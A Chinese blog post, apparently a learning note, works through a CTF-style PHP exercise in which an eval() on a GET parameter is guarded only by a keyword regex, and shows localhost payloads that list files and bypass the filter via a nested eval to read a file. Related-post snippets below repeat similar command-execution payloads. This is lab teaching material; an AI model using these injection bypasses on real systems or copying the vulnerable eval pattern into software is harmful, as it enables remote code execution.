第十四天命令执行绕过练习题

已于 2022-03-25 20:04:13 修改
阅读量371 收藏 1
点赞数
分类专栏: 网络安全 笔记 文章标签: web安全
于 2022-03-21 12:03:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42096378/article/details/123596264
版权

第一题

//1.	读取同目录下的bihuo.txt 文件的内容 linux环境下自己创建bihuo.txt
<?php
error_reporting(0);#屏蔽错误
if(isset($_GET['c'])) {
   
    $c = $_GET['c'];
    if(!preg_match('/bihuo/i', $c)) {
    #过滤bihuo关键字
        eval($c);#代码执行
    }
} else {
   
    highlight_file(__FILE__);
}
?>

代码分析

这里是引用 preg_match 函数用于执行一个正则表达式匹配
过滤大小的bihuo

解题
查看文件

http://127.0.0.1/include.php?c=system(%27ls%27);

文件

方法一

http://127.0.0.1/include.php?c=eval($_GET[1]);&1=system(%27cat%20bihuo.txt%27);

c参数用一个跳板穿进去的值让他执行另一个参数的值那另一个参数的值就逃逸出去c的正则从而可以执行任何代码

最低0.47元/天 解锁文章
嗯光
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
天命
02-17
"天命"在这个上下文中可能是指一个项目或者资源的名称,但具体到IT行业,特别是与HTML相关的主题,我们可以理解为这是一个关于Web开发的学习资源或代码库。HTML(HyperText Markup Language)是构建网页的基础语言,...
七年级语文上册第六单元24论语十二章翻译练习题无答案冀教版
08-05
这里我们关注的是七年级语文上册第六单元的24课——《论语》十二章的翻译练习题,它属于冀教版教材的内容,主要目的是帮助学生理解和掌握《论语》中的核心思想和教诲。 1. 子曰:“学而时习之,不亦说乎?有朋自...
命令执行绕过的练习(一)
qwzf
08-12 1718
0x00 前言 总结完命令执行漏洞的相关绕过知识,做一下CTF题巩固一下,并总结一下做题过程。 0x01 GKCTF-Check_In 题目源码: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct()
ctfhub平台rce练手
New_Ss_的博客
02-02 281
远程代码执行eval 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,如果没有进行周全的过滤,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞 远程代码执行eval 一、 (来自ctfhub) 经过代码审计可以看到没有经过任何的过滤,就将“cmd”的内容进行eval执行。我们可以经过对c
第四周 ctfhub
plant1234的博客
03-06 274
RCEeval执行:文件包含php://input:远程包含:读取源代码:文件包含:命令注入-无过滤:命令注入-过滤cat:命令注入-过滤空格:命令注入-过滤目录分隔符:命令注入-过滤运算符:命令注入-综合练习: eval执行: 首先打开环境: 根据资料知道: eval会把字符串当作php语言执行 所以: 执行:/?cmd=system(“ls …/”); 没有发现什么,在进行下返回上一目录: 没有发现什么,在进行下返回上一目录: 发现flag文件 cat它 /?cmd=system(“cat%20
【CTFshow】命令执行web29-web54
weixin_51614272的博客
02-23 2513
web29 源码 if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } eval函数,把GET方法获取的变量c内容,当做命令执行 过滤了flag关键字,不区分大小写 构造payload: ?c=system("tac fla?.php"); ?c=system("t
CTFSHOW WEB入门 命令执行 web29-48
sinat_41572027的博客
07-09 1809
CTFSHOW WEB入门 命令执行 web29-48
河大版七年级语文下册第四单元练习题及答案精选.doc
09-26
这篇文档主要包含两部分的内容,一部分是语文课后的练习题,另一部分是关于蜘蛛与人类的科普文章。首先,我们来看看语文练习题的部分。 题目涵盖了基础的汉字拼音、文学常识、词语解释、句子翻译以及阅读理解。这些...
第一节科学的世界观和方法论练习题.pdf
11-04
14. 人的主观世界的核心:世界观和人生观是主观世界的中心,决定着个体的行为和思考方式。选项C正确。 15. 哲学的地位:爱因斯坦的话表明哲学对其他科学具有指导作用,选项C体现了这一点。 16. 在马克思主义哲学...
归去来兮辞练习题及答案精选.doc
09-26
聊乘化以归尽,乐天天命复奚疑?" 10. **默写**: 未给出具体的空白内容,根据原文填写即可。 通过以上分析,我们可以看到,《归去来兮辞》不仅仅是对田园生活的描绘,更是陶渊明对个人价值和人生哲学的深刻反思...
web入门 命令执行 web29-web41
博客地址 www.sec0nd.top
03-14 5439
文章目录web29web30web31web32 参考文章:命令执行绕过小技巧、命令执行漏洞进阶 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 输入c变量,把c中的flag过滤掉,然
ctfshow web入门 命令执行
qq_50589021的博客
10-07 2731
命令执行 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } ?> 考点: 绕过特殊字符的过滤 payload: ?c=system('ls');//flag.php index.php ?
CTFSHOW-命令执行
Monica的博客
09-03 4032
WEB29 题目: <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 分析:题目过滤了flag且忽略大小写 知识点:linux通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符..
CTFshow——命令执行
lee_maple的博客
04-23 5562
CTFshow——命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 可以看到,flag已经被过滤掉,先查看目录 我们可以使用通配符绕过flag的过滤 Web30 <?php
CTFshow-web入门-命令执行
m0_52920608的博客
03-26 5273
CTFshow web入门 命令执行 ctfshowweb命令执行
ctfshow web入门 命令执行29-32
ts6666a的博客
02-05 578
web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } preg_match 函数用于执行一个正则表达式匹配。/i意味着不分大小写。本句含义是不能用flag值且忽略了大小写。说明对flag进行
ctfhsow web入门 命令执行大全
wangringyi的博客
09-25 2661
全网最全命令执行方法
ctfshow-web入门——命令执行(1)(web29-web40)
m0_62905745的博客
03-16 871
本篇文章是ctfshow的web入门部分的命令执行部分wp(web29-web 40),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
请分析一下职业:图形开发工程师-工具(3D软件功能扩展),该职业由上海米哈游天命科技有限公司提供,请进行SWOT分析与如何威胁排除
最新发布
05-21
2. 上海米哈游天命科技有限公司是一家知名游戏开发公司,具有良好的声誉和品牌影响力。 3. 该职业的需求量较大,能够提供稳定的就业机会和良好的薪酬待遇。 Weaknesses(劣势): 1. 该职业的技能门槛较高,需要不断...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值